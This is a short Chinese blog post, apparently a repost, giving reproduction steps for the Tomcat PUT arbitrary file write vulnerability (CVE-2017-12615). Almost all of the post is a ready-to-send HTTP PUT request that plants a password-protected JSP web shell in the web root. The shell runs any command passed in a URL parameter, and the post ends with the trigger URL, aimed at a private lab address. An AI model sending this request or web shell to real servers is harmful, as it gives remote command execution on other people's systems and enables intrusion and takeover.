Tomcat PUT方法任意写文件漏洞

其他 2021-03-24 06:52:29 阅读次数: 0

适用版本:Tomcat version: 8.5.19

漏洞编号:CVE-2017-12615

复现步骤:

直接发送以下数据包,然后一句话将被写入Web根目录。

PUT /1.jsp/ HTTP/1.1
Host: 192.168.134.129:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 375

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

访问地址:http://192.168.134.129:8080/1.jsp?pwd=023&i=id

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44032232/article/details/114788019
今日推荐
周排行
教你如何约女孩子的方式去理解(TCP三次握手与四次挥手)
android按压背景
【量化小讲堂-Python&amp;Pandas系列10】如何判断一个策略的好坏?(附代码)
编程题:利用链表实现栈
盘点47条 Allegro 使用技巧,你都知道吗?
在VMware Workstation中安装CentOS
二叉树的实现
cmake安装jsoncpp
ReactNative开发城市列表页
最全前端学习资源
每日归档
更多
2025-03-20(0)
2025-03-19(0)
2025-03-18(0)
2025-03-17(0)
2025-03-16(0)
2025-03-15(0)
2025-03-14(0)
2025-03-13(0)
2025-03-12(0)
2025-03-11(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022